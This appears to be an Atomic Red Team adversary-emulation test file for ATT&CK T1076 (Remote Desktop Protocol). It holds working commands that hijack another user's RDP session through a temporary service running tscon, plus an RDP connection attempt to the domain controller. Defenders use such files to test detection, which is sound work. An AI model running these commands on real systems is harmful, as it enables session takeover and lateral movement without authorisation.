9be96cf54f
* Added MacOS and Linux isElevated check [toso: test MacOS] * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * T1076 RDP To Domain Controller
49 lines
1.4 KiB
YAML
49 lines
1.4 KiB
YAML
---
|
|
attack_technique: T1076
|
|
display_name: Remote Desktop Protocol
|
|
|
|
atomic_tests:
|
|
- name: RDP
|
|
description: |
|
|
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
|
|
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
query user
|
|
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
|
|
net start sesshijack
|
|
sc.exe delete sesshijack
|
|
|
|
- name: RDPto-DomainController
|
|
description: |
|
|
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
|
|
logonserver:
|
|
description: ComputerName argument default %logonserver%
|
|
type: String
|
|
default: $ENV:logonserver.TrimStart("\")
|
|
|
|
username:
|
|
description: Username argument default %USERDOMAIN%\%username%
|
|
type: String
|
|
default: $Env:USERDOMAIN\$ENV:USERNAME
|
|
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
prereq_command: |
|
|
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
|
|
command: |
|
|
Connect-RDP -ComputerName #{logonserver} -User #{username}
|